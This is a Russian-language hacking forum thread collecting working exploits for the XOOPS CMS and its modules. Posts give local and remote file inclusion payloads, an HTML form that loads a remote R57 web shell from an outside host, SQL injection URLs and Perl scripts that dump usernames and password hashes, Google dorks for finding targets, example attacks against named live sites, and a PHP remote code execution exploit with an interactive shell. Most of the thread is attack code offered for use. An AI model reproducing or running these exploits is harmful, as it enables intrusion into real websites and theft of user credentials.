[Обзор уязвимости] Xoops и его модулей.

Discussion in 'Веб-уязвимости' started by icedz, 15 Mar 2008.

  1. icedz

    icedz Banned

    Joined:
    14 Jan 2008
    Messages:
    128
    Likes Received:
    850
    Reputations:
    209
    Shit happens.
     
    #1 icedz, 15 Mar 2008
    Last edited: 19 Jan 2014
    6 people like this.
  2. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    LFI

    Vulnerable: XOOPS 2.0.18

    Уязвимый скрипт: htdocs/install/index.php
    PHP:
    $language 'english';
    if ( !empty(
    $_POST['lang']) ) {
        
    $language $_POST['lang'];
    .
    .
    .
    .



    if ( 
    file_exists("./language/".$language."/install.php") ) {
        include_once 
    "./language/".$language."/install.php";
    POST-переменная "lang" не фильтруется

    PoC:
    Code:
    POST /xoops-2.0.18/htdocs/install/index.php HTTP/1.0
    Cookie: install_lang=english; lang=russian; PHPSESSID=p113cjpff5dkrkoka01al18kk5; dk_sid=sfa6hlhn75pobg6kqe5m8p30j1
    Content-Length: 67
    Accept: */*
    Accept-Language: en-US
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
    Host: localhost
    Content-Type: application/x-www-form-urlencoded
    Referer: http://localhost/xoops-2.0.18/htdocs/install/index.php
    
    lang=/../../../../../../../../boot.ini%00.html&op=start&submit=Next
    URL Redirection

    Vulnerable: XOOPS 2.0.18

    Уязвимый скрипт: htdocs/user.php?xoops_redirect
    POST-переменная "xoops_redirect" не фильтруется

    PoC:
    Code:
    http://[server]/[installdir]/htdocs/user.php?xoops_redirect=http://evilsite.com 
    
     
  3. b!atnoy

    b!atnoy .::The Mafia::.

    Joined:
    1 Jan 2008
    Messages:
    96
    Likes Received:
    87
    Reputations:
    3
    XOOPS Module Dictionary <= 0.94 Remote SQL Injection Vulnerability

    Code:
    ##########################################
    #
    # XOOPS Module dictionary(0.94-0.91-0.70)SQL Injection
    #
    ##########################################
    #
    ##AUTHOR : S@BUN
    #
    ####HOME : http://www.milw0rm.com/author/1334
    #
    ####MAİL : [email protected]
    #
    ###########################################
    #
    # DORK 1 : allinurl: "modules/dictionary"
    #
    # DORK 2 : allinurl: "modules/dictionary/print.php?id"
    #
    ###########################################
    EXPLOIT :
    
    modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*
    ###########################################
    Dictionary Version 0.94 by nagl.ch
    Dictionary Version 0.91 by nagl.ch
    Dictionary Version 0.70 by nagl.ch
    ###########################################
    ##################S@BUN####################
    ###########################################
    #####[email protected]#####
    ###########################################
    
    # milw0rm.com [2008-03-17]

    milw0rm.com​
     
  4. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    XOOPS Project-Recette(Recipe)2.2 SQL Injection Vulnerability

    SQL Injection

    Vulnerable: XOOPS Project-Recette(Recipe)2.2

    Exploit:
    Code:
    modules/recipe/detail.php?id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,0,uname,pass,111,222+from%2F%2A%2A%2Fxoops_users/*
    
    Dork:
    Code:
    allinurl :\"modules/recipe\"
    
     
  5. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    RFI

    Vulnerable: XOOPS Module XFsection

    Vuln script: modify.php

    PoC:
    Code:
    http://www.site.com/modules/xfsection/modify.php?dir_module=evilcode.txt?
    
    Vulnerable: XOOPS Module XT-Conteudo

    Vuln script: /admin/spaw/spaw_control.class.php
    PHP:
    include $spaw_root.'config/spaw_control.config.php';
    include 
    $spaw_root.'class/toolbars.class.php';
    include 
    $spaw_root.'class/lang.class.php';
    PoC:
    Code:
    http://site/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=[shell]?
    
    Vulnerable: XOOPS Module Cjay Content 3

    Vuln script: /admin/editor2/spaw_control.class.php
    PHP:
    include $spaw_root.'config/spaw_control.config.php';
    include 
    $spaw_root.'class/toolbars.class.php';
    include 
    $spaw_root.'class/lang.class.php';
    Note: Register globals must be ON, and Magic Quotes must be OFF

    PoC:
    Code:
    http://site/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=[shell ]?
    Vulnerable: XOOPS Module icontent 1.0

    Exploit:
    HTML:
    <html>
    <head>
    <meta http-equiv="Content-Type" content="text/html;
    charset=windows-1254">
    <title>XOOPS Module icontent v.1.0 Remote File Inclusion
    Exploit</title>
    
    <script language="JavaScript">
    
    //'===============================================================================================
    //'[Script Name: XOOPS Module icontent v.1.0
    //'[Author     : Mahmood_ali
    //'[S.Page     : 
    http://mirror.in.th/sourceforge.net/x/xo/xoops/xoops2-mod_icontent.zip
    //'===============================================================================================
    
    //'[[V.Code]]------------------------------------------------------
    //'
    //'include $spaw_root.'config/spaw_control.config.php';
    //'include $spaw_root.'class/toolbars.class.php';
    //'include $spaw_root.'class/lang.class.php';
    //'
    //'[[V.Code]]---------------------------------------------------------
    
    //# Tryag.Com
    //# ...
    
    
    
    
       var path="/modules/icontent/include/wysiwyg/"
       var adres="spaw_control.class.php" //File name
       var acik ="?spaw_root=" // Line 15
       var shell="http://lppm.uns.ac.id/r57.txt?" // R57Shell
    
       function command(){
           if (document.rfi.target1.value==""){
              alert("Failed..");
          return false;
        }
    
    
    
      rfi.action= document.rfi.target1.value+path+adres+acik+shell; // Ready
      rfi.submit(); // Form Submit
       }
    </script>
    
    </head>
    
    <body bgcolor="#000000">
    <center>
    
    <p><b><font face="Arial" size="2"
    color="#FFFFFF">XOOPS Module icontent 
    v.1.0 Remote File Inclusion Exploit</font></b></p>
    
    <p></p>
    <form method="post" target="getting"
    name="rfi" onSubmit="command();">
        <b><font face="Tahoma" size="1"
    color="#FF0000">Target:</font><font 
    face="Tahoma" size="1" 
    color="#FFFF00">[http://[target]/[scriptpath]</font><font
    color="#00FF00" 
    size="2" face="Tahoma">
      </font><font color="#FF0000"
    size="2"> </font></b>
      <input type="text" name="target1"
    size="20" style="background-color: 
    #808000"
    onmouseover="javascript:this.style.background='#808080';" 
    onmouseout="javascript:this.style.background='#808000';"></p>
      <p><input type="submit" value="Gonder"
    name="B1"><input type="reset" 
    value="Sifirla" name="B2"></p>
    </form>
    <p><br>
    <iframe name="getting" height="337"
    width="633" scrolling="yes" 
    frameborder="0"></iframe>
    </p>
    
    <b><font face="Lucida Handwriting" size="5" 
    color="#FF0000">Mahmood_ali</font></b><p>
    <b><a href="http://tryag.com/cc">
    <font face="Lucida Handwriting" size="5" 
    color="#FFFFFF">TrYaG-Team</font></a></b></p>
    </p>
    </center>
    </body>
    
    </html>
    
    Vulnerable: XOOPS Module tsdisplay4xoops 0.1

    PoC:
    Code:
    [Path]/modules/tsdisplay4xoops/blocks/tsdisplay4xoops_block2.php?xoops_url=Shell
    

    Remote SQL Injection

    Vulnerable: XOOPS Module Jobs <= 2.4

    Code:
    #!/usr/bin/perl
    #[Script Name: XOOPS Module Jobs <= 2.4 (cid) Remote BLIND SQL
    Injection Exploit
    #[Coded by   : ajann
    #[Author     : ajann
    #[Contact    : :(
    #[Dork       : "inurl:/modules/jobs/"
    #[S.Page     : http://www.jlmzone.com/
    #[$$         : Free
    #[..         : ajann,Turkey
    
    
    use IO::Socket;
    if(@ARGV < 1){
    print "
    [========================================================================
    [//  XOOPS Module Jobs <= 2.4 (cid) Remote BLIND SQL Injection Exploit
    [//                   Usage: exploit.pl [target]
    [//                   Example: exploit.pl victim.com
    [//                   Example: exploit.pl victim.com
    [//                           Vuln&Exp : ajann
    [========================================================================
    ";
    exit();
    }
    #Local variables
    $kapan = "/*";
    $server = $ARGV[0];
    $server =~ s/(http:\/\/)//eg;
    $host = "http://".$server;
    $port = "80";
    $file = "/modules/jobs/index.php?pa=jobsview&cid=";
    
    print "Script <DIR> : ";
    $dir = <STDIN>;
    chop ($dir);
    
    if ($dir =~ /exit/){
    print "-- Exploit Failed[You Are Exited] \n";
    exit();
    }
    
    if ($dir =~ /\//){}
    else {
    print "-- Exploit Failed[No DIR] \n";
    exit();
     }
    
    print "User ID (uid): ";
    $id = <STDIN>;
    chop ($id);
    
    $target =
    "-1%20union%20select%203,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),1%20from%20xoops_users%20where%20uid%20like%20".$id.$kapan;
    $target = $host.$dir.$file.$target;
    
    #Writing data to socket
    print
    "+**********************************************************************+\n";
    print "+ Trying to connect: $server\n";
    $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr
    => "$server", PeerPort => "$port") || die
    "\n+ Connection failed...\n";
    print $socket "GET $target HTTP/1.1\n";
    print $socket "Host: $server\n";
    print $socket "Accept: */*\n";
    print $socket "Connection: close\n\n";
    print "+ Connected!...\n";
    #Getting
    while($answer = <$socket>) {
    if ($answer =~ /username:(.*?)pass/){
    print "+ Exploit succeed! Getting admin information.\n";
    print "+ ---------------- +\n";
    print "+ Username: $1\n";
    }
    
    if ($answer =~ /password:(.*?)<\/b>/){
    print "+ Password: $1\n";
    }
    
    if ($answer =~ /Syntax error/) { 
    print "+ Exploit Failed : ( \n";
    print
    "+**********************************************************************+\n";
    exit(); 
    }
    
    if ($answer =~ /Internal Server Error/) {
    print "+ Exploit Failed : (  \n";
    print
    "+**********************************************************************+\n";
    exit(); 
    }
     }
    
     
  6. Solide Snake

    Solide Snake Banned

    Joined:
    28 Apr 2007
    Messages:
    382
    Likes Received:
    820
    Reputations:
    69
    Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it

    Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it

    PHP:
    #############################################
    #Coded By Cr@zy_King      http://coderx.org]#
    #############################################

    use IO::Socket;

    if (@
    ARGV != 3)
    {
        print 
    "\n-----------------------------------\n";
        print 
    "Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it\n";
        print 
    "-----------------------------------\n";
        print 
    "\n4ever Cra\n";
        print 
    "crazy_kinq[at]hotmail.co.uk\n";
        print 
    "http://coderx.org\n";
        print 
    "\n-----------------------------------\n";
        print 
    "\nKullanim: $0 <server> <path> <uid>\n";
        print 
    "Ornek: $0 www.victim.com /path 1\n";
        print 
    "\n-----------------------------------\n";
        exit ();
    }

    $server $ARGV[0];
    $path $ARGV[1];
    $uid $ARGV[2];

    $socket IO::Socket::INET->newProto => "tcp"PeerAddr => "$server",  PeerPort =>
    "80");
    printf $socket ("GET
    %s/modules/articles/article.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/xoops_users/**/WHERE/**/uid=
    $uid/*
    HTTP/1.0\nHost: %s\nAccept: */*\nConnection:
    close\n\n"
    ,
    $path,$server,$uid);

    while(<
    $socket>)

    {
        if (/\>(\
    w{32})\</) { print "\nID '$uid' User Password :\n\n$1\n"; }
    }

    # Cr@zy_King
    # http://coderx.org
    [email protected]
     
  7. ph1l1ster

    ph1l1ster Elder - Старейшина

    Joined:
    11 Mar 2008
    Messages:
    396
    Likes Received:
    153
    Reputations:
    19
    Solide Snake, не разу на blind не натыкался.

    xoops # Article Module # sql injection


    Code:
    modules/articles/article.php?id={SQL}--
    +xoops_users
    -uname
    -pass


    example:

    Code:
    http://www.geo.pu.ru/modules/articles/article.php?id=-9999+union+select+1,2,3,4,5,6,concat(0x3a,uname,0x3a,pass),8,9,0,1,2,3,4,5,6,7,8,9,0+from+xoops_users+limit+0,1--
    mega exploit :D :

    Code:
    #!usr/bin/perl
    use LWP::UserAgent;
    print qq(
    # xoops article module exploit #
    #     coded by ph1l1ster       #\n\n# Enter site:\n> );
    $site = <STDIN>;chomp($site);
    print "\n# Enter numbers of users:\n> ";
    $users = <STDIN>;chomp($users);
    &inj;
    sub inj{
    print "\nStarting..\n\n";
    $limit = 0;
    while ($limit <= $users){
    $url = "http://".$site."/modules/articles/article.php?id=-9999+union+select+1,2,3,4,5,6,concat(555666,0x3a,uname,0x3a,pass,0x3a,777888),8,9,10,11,12,13,14,15,16,17,18,19,20+from+xoops_users+limit+".$limit.",1--";
    $client = LWP::UserAgent->new( ) or die;
    $answer = $client->get($url);
    $limit ++;
    if ($answer->content =~ /555666:(.*):777888/){
    print $1."\n";}}
    print "Done!"}
     
  8. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    XOOPS modules/easyweb/

    SQL-inj

    Exploit
    Code:
    -555555+union+select+1,2,3,concat_ws(0x3a,uname,pass),5+from+xoops_users--
    http://ofernio.ru/portal/modules/easyweb/?artid=-5+union+select+1,2,3,concat_ws(0x3a,uname,pass),5+from+xoops_users--

    dOrK: inurl:/modules/easyweb/
     
    _________________________
    #8 HAXTA4OK, 3 Sep 2009
    Last edited: 3 Sep 2009
    1 person likes this.
  9. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit

    Code:
    #!/usr/bin/php -q
    <?php
    
    /****************************************************************
     * XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit    *
     * by athos - staker[at]hotmail[dot]it                          *            
     * http://xoops.org                                             *           
     *                                                              *             
     * thanks to s3rg3770 and The:Paradox                           *            
     *                                                              *            
     * works with register globals on                               *            
     * note: this vuln is a remote php code execution               *              
     *                                                              *   
     * Directory (xoops_lib/modules/protector/)                     *
     * onupdate.php?mydirname=a(){} [PHP CODE] function v           *
     * oninstall.php?mydirname=a(){} [PHP CODE] function v          *
     * notification.php?mydirname=a(){} [PHP CODE] function v       *
     ****************************************************************/
    
    error_reporting(0);
    
    list($cli,$host,$path,$num) = $argv;
    
    if ($argc != 4) {  
        
        print "\n+--------------------------------------------------------------+\n";
        print "\r| XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit    |\n";    
        print "\r+--------------------------------------------------------------+\n";
        print "\rby athos - staker[at]hotmail[dot]it / http://xoops.org\n";
        print "\rUsage: php xpl.php [host] [path]\n\n";
        print "\rhost     + localhost\n";
        print "\rpath     + /XOOPS\n";
        exit;      
    }         
    
    exploit();
    
    function exploit() {
        
        global $num;
        
        if ($num > 3) {
           die("\n$num isn't a valid option\n");
        } 
        else {
           yeat_shell();
        }
    }
    
        
    function yeat_shell() {
        
        while (1) {
            echo "yeat[php-shell]~$: "; 
            $exec = stripslashes(trim(fgets(STDIN)));  
            
            if (preg_match('/^(exit|--exit|quit|--quit)$/i',$exec)) die("\nExited\n");
            if (preg_match('/^(help|--help)$/i',$exec)) echo("\nExample: uname -a\n");
            if (preg_match('/^(about|--about)$/i',$exec)) echo("\nstaker[at]hotmail[dot]it\n");
    
            print data_exec($exec);     
        }
    }
    
    
    function data_exec($exec) {
        
        global $host,$path,$num;
        
        if ($num == 1) {
            $urlex = "/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}";
        }
        
        if ($num == 2) {
            $urlex = "/xoops_lib/modules/protector/notification.php?mydirname=a(){}";
        }
        
        if ($num == 3) {
            $urlex = "/xoops_lib/modules/protector/oninstall.php?mydirname=a(){}";
        }
        
        $exec = urlencode($exec);
        $data .= "GET /{$path}/{$urlex}{$exec}function%20v HTTP/1.1\r\n";
        $data .= "Host: {$host}\r\n";
        $data .= "User-Agent: Lynx (textmode)\r\n";
        $data .= "Connection: close\r\n\r\n";
        
        $html = data_send ($host,$data);
    
        return $html;
    }
    
    
    function data_send ($host,$data) {
       
        if (!$sock = @fsockopen($host,80)) {
            die("Connection refused,try again!\n");
        }   fputs($sock,$data);
        
        while (!feof($sock)) { $html .= fgets($sock); }
        
        fclose($sock);
        return $html;
    }
    (c)milw0rm.com
     
    1 person likes this.
  10. [underwater]

    [underwater] Member

    Joined:
    29 Mar 2009
    Messages:
    78
    Likes Received:
    92
    Reputations:
    27
    LFI[Xoops 2.2.6]

    Под руку попалась эта версия.
    Смотри исходники system/admin.php:

    Code:
    <?php
    if (isset($_POST['fct'])) {
    $fct = trim($_POST['fct']);
    }
    if (isset($_GET['fct'])) {
    $fct = trim($_GET['fct']);
    }
    $xoopsOption['pagetype'] = "admin";
    include "../../mainfile.php";
    if (!$xoopsUser) {
    redirect_header(XOOPS_URL."/user.php", 3, _AD_NORIGHT);
    }
    include XOOPS_ROOT_PATH."/include/cp_functions.php";
    
    include_once XOOPS_ROOT_PATH."/modules/system/constants.php";
    $error = false;
    if (isset($fct) && $fct != '') {
    if (file_exists(XOOPS_ROOT_PATH."/modules/system/admin/".$fct."/xoops_version.php")) {
    
    if (file_exists(XOOPS_ROOT_PATH."/modules/system/language/".$xoopsConfig['language']."/admin/".$fct.".php")) {
    include XOOPS_ROOT_PATH."/modules/system/language/".$xoopsConfig['language']."/admin/".$fct.".php";
    } elseif (file_exists(XOOPS_ROOT_PATH."/modules/system/language/english/admin/".$fct.".php")) {
    ...
    }
    include XOOPS_ROOT_PATH."/modules/system/admin/".$fct."/xoops_version.php";
    ...
    Експлоит:

    Code:
    http://site.com/modules/system/admin.php?fct=../../../../../../../etc/passwd%00